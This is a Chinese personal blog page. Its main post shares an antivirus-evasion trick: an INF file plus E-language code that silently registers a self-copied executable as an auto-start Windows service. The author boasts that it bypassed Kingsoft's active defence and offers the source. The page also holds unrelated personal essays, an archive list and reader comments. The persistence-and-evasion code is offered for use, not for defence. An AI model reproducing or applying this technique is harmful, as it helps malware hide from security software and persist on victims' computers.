重新开放博客啦
2010-7-31 王健宇
我不应该这样子!得面对,网络是自由的,不能因为一点事而把我的心血全部毁掉!想好了!重新开放博客
转:利用INF安装服务启动 及 浅析瑞星行为检测、360主动防御(最后为本人看此文的免杀思路)
看完此文后写写我看后的想法。
首先谢谢本文作者给我提供了一个这么好的免杀思路,今天我测试了一下金山,过了主动防御,我等下会去测试瑞星和360。应该过的。
我的思路是这样子的,我只会易语言,就说说用易语言编写怎么过
首先我们新建一个文件
test.inf
[Version]
Signature="$WINDOWS NT$"
[DefaultInstall.Services]
AddService=Xiaoyu,,Add_Evil_Service ;服务名称
[Add_Evil_Service]
DisplayName=Xiaoyu ;显示名称
Description=Xiaoyu ;服务描述
ServiceType=0x10 ;服务类型
StartType=2 ;启动类型
ErrorControl=0 ;错误控制
ServiceBinary=cmd.exe /c start C:\windows\Xiaoyu.exe ;服务要加载的exe文件路径
然后把该文件添加到易语言的资源表,在图片或图片组新建一个图片1,__启动窗口_创建完毕后执行如下代码:
写到文件(“c:\test.inf”,#图片1)
运行(“rundll32.exe setupapi,InstallHinfSection DefaultInstall 128 C:\test.inf ”)
复制文件 (取运行目录 () + “\” + 取执行文件名 (), “c:\windows\xiaoyu.exe”)
这样便成功添加一个系统服务项,每次开机都会自动运行!哈哈、我的思路到此为止,各位有别的语言的免杀思路请分享下。
附件有易语言源代码
自嘲(八)…
一个人在世上活着不是为了如同机器一样的读书,读那么多书还不就是为了以后为社会为国家多做贡献?同时也是为自己将来好过一些,道理谁都懂。也不是说不读书,我只想说,对于我这样活泼爱动的学生如今的教育是教不好我的。(未完待续)自嘲(七)…
写着写着就怀念以前去了,其实我想说的就是做爸妈的是读书过来的,想让子女比他们强,读更多的书,如此循环,循环就死循环了。我有很多梦想,很多很多,不是忘了,就是不了了之,到如今,都杯具了,我们这一代都没有了梦想,被书压着。(未完待续)自嘲(六)…
那时候多么爱好啊~怀念与哥哥在一起的时光,现在他去当兵了,只有我一个人了。呵呵、还记得那时候家里也不允许我们玩四驱车,我们每天放学了就偷偷玩,哥耳朵尖,听到声音就知道我爸妈回来了,马上收起车子摆好书本装模做样…(未完待续)Sort
Archive
- 2023年1月(1)
- 2019年4月(1)
- 2018年12月(2)
- 2014年9月(1)
- 2014年7月(1)
- 2014年5月(4)
- 2013年4月(10)
- 2013年3月(2)
- 2012年11月(10)
- 2012年10月(2)
- 2012年9月(2)
- 2012年8月(9)
- 2012年7月(1)
- 2012年6月(4)
- 2012年5月(4)
- 2012年4月(11)
- 2012年3月(11)
- 2012年1月(16)
- 2011年12月(6)
- 2011年11月(8)
- 2011年10月(8)
- 2011年9月(3)
- 2011年8月(6)
- 2011年7月(3)
- 2011年6月(5)
- 2011年5月(10)
- 2011年4月(4)
- 2011年3月(4)
- 2011年2月(7)
- 2011年1月(16)
- 2010年12月(9)
- 2010年11月(29)
- 2010年10月(14)
- 2010年9月(15)
- 2010年8月(16)
- 2010年7月(22)
- 2010年6月(19)
- 2010年5月(27)
- 2010年4月(21)
- 2010年3月(24)
- 2010年2月(9)
Comment
- Lightning_bear
失效了 - admin
在哪下载? - 王健宇
@红河:CMD命令里... - 红河
台式机安装了蓝牙。但... - M2nT1ger
@LiveOnLov... - LiveOnLove
可以将Tablet ... - 阿生
表示支持了 - M2nT1ger
@无:每种都学啊。 - 无
向您这么厉害,得学习... - M2nT1ger
@被屏蔽的昵称:谢谢...